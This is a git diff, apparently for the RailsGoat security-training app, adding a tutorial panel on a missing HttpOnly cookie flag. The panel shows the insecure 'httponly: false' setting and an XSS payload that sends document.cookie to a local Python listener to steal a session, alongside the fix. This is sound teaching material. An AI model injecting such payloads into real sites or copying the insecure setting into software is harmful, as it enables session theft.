diff --git a/Gemfile.lock b/Gemfile.lock
index 657e83d..ef3263b 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -140,7 +140,7 @@ GEM
     kgio (2.9.2)
     launchy (2.4.2)
       addressable (~> 2.3)
-    libv8 (3.16.14.3)
+    libv8 (3.16.14.5)
     listen (2.7.9)
       celluloid (>= 0.15.2)
       rb-fsevent (>= 0.9.3)
@@ -276,7 +276,7 @@ GEM
     thor (0.19.1)
     thread_safe (0.3.4)
     tilt (1.4.1)
-    timers (4.0.0)
+    timers (4.0.1)
       hitimes
     travis-lint (2.0.0)
       json
diff --git a/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb
new file mode 100644
index 0000000..498a0c6
--- /dev/null
+++ b/app/views/layouts/tutorial/broken_auth_sess/_httponly_flag.html.erb
@@ -0,0 +1,93 @@
+<div class="widget">
+    <div class="widget-header">
+      <div class="title">
+        <span class="fs1" aria-hidden="true" data-icon="&#xe092;"></span> A2 - Broken Authentication and Session Management - Lack of HttpOnly Flag
+      </div>
+    </div>
+    <div class="widget-body">
+      <div id="accordion1" class="accordion no-margin">
+        <div class="accordion-group">
+          <div class="accordion-heading">
+            <a href="#collapseHttpOnlyOne" data-parent="#accordion1" data-toggle="collapse" class="accordion-toggle">
+              <i class="icon-info icon-white">
+              </i>
+              Description
+            </a>
+          </div>
+          <div class="accordion-body in collapse" id="collapseHttpOnlyOne" style="height: auto;">
+            <div class="accordion-inner">
+        		The HttpOnly flag prevents access to the document.cookie attribute of the DOM via JavaScript. Helpful for limiting the impact of Cross-Site Scripting as it relates to session theft.
+            </div>
+          </div>
+        </div>
+        <div class="accordion-group">
+          <div class="accordion-heading">
+            <a href="#collapseHttpOnlyTwo" data-parent="#accordion1" data-toggle="collapse" class="accordion-toggle">
+              <i class="icon-bug icon-white">
+              </i>
+              Bug
+            </a>
+          </div>
+          <div class="accordion-body collapse" id="collapseHttpOnlyTwo" style="height: 0px;">
+            <div class="accordion-inner">
+				<p class="desc">
+					By default, Ruby on Rails protects its' cookies with the HttpOnly flag. However, it is possible to disable this security protection and is not recommended. You can disable this protection using the flag highlighted below. This is an insecure and unnecessary change.
+				</p>	
+       			<pre class="ruby">
+Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_session', <span style="background:yellow">httponly: false</span>
+				</pre>
+            </div>
+          </div>
+        </div>
+        <div class="accordion-group">
+          <div class="accordion-heading">
+            <a href="#collapseHttpOnlyThree" data-parent="#accordion1" data-toggle="collapse" class="accordion-toggle">
+              <i class="icon-lightning icon-white">
+              </i>
+              Solution
+            </a>
+          </div>
+          <div class="accordion-body collapse" id="collapseHttpOnlyThree" style="height: 0px;">
+            <div class="accordion-inner">
+			  <p><b>Lack of the HttpOnly Flag - ATTACK</b></p>
+	        	<p class="desc">
+				  Navigate to the sign-up page, sign up as a user, but in the first name field, enter:
+				  <pre class="ruby">
+					&lt;script&gt;document.location=&quot;http://localhost:8000/&quot; + document.cookie &lt;/script&gt;
+				  </pre>
+				  <p class="desc">
+				  	Additionally, fire up Python's SimpleHTTPServer module using the following command:
+				  </p>
+				  <pre class="ruby">
+					$ python -m SimpleHTTPServer
+				  </pre>	
+				  <p class="desc">
+				     Now authenticate to the application as the user you just created, you'll be redirected, now review the terminal tab that has the python server running. You'll notice that you see a GET request with the user's session in the request path. This means you have now grabbed the user's session via Cross-Site Scripting.
+				  </p>
+			   </p>
+              <p><b>Lack of the HttpOnly Flag - SOLUTION</b></p>
+        	  	<p class="desc">
+				  Keep the default configuration "as-is" and do not make this change. If this exists in your code base, remove it.
+				</p>
+            </div>
+          </div>
+        </div>
+    <div class="accordion-group">
+          <div class="accordion-heading">
+            <a  style="background-color: rgb(181, 121, 158)" href="#collapseHttpOnlyFour" data-parent="#accordion1" data-toggle="collapse" class="accordion-toggle">
+              <i class="icon-aid icon-white">
+              </i>
+              Hint
+            </a>
+          </div>
+          <div class="accordion-body collapse" id="collapseHttpOnlyFour" style="height: 0px;">
+            <div class="accordion-inner">
+        <p class="desc">
+         Can JavaScript interact with my session cookie?
+        </p>
+             </div>
+          </div>
+        </div>
+      </div>
+    </div>
+</div>
diff --git a/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb b/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb
index 98cc566..de35813 100644
--- a/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb
+++ b/app/views/layouts/tutorial/broken_auth_sess/_insecure_compare.html.erb
@@ -67,7 +67,7 @@
           </div>
           <div class="accordion-body collapse" id="collapseCompThree" style="height: 0px;">
             <div class="accordion-inner">
-              <p><b>Lack of Password Complexity - SOLUTION</b></p>
+              <p><b>Insecure Timing Attacks - SOLUTION</b></p>
         <p>
         Within app/models/user.rb:
         </p>
diff --git a/app/views/tutorials/broken_auth.html.erb b/app/views/tutorials/broken_auth.html.erb
index 4953d5b..4b9056c 100755
--- a/app/views/tutorials/broken_auth.html.erb
+++ b/app/views/tutorials/broken_auth.html.erb
@@ -15,6 +15,11 @@
           <%= render :partial => ("layouts/tutorial/broken_auth_sess/insecure_compare")%>
         </div> <!-- End Span12-->
     </div>
+    <div class="row-fluid">
+        <div class="span12">
+          <%= render :partial => ("layouts/tutorial/broken_auth_sess/httponly_flag")%>
+        </div> <!-- End Span12-->
+    </div>
   </div>
 </div>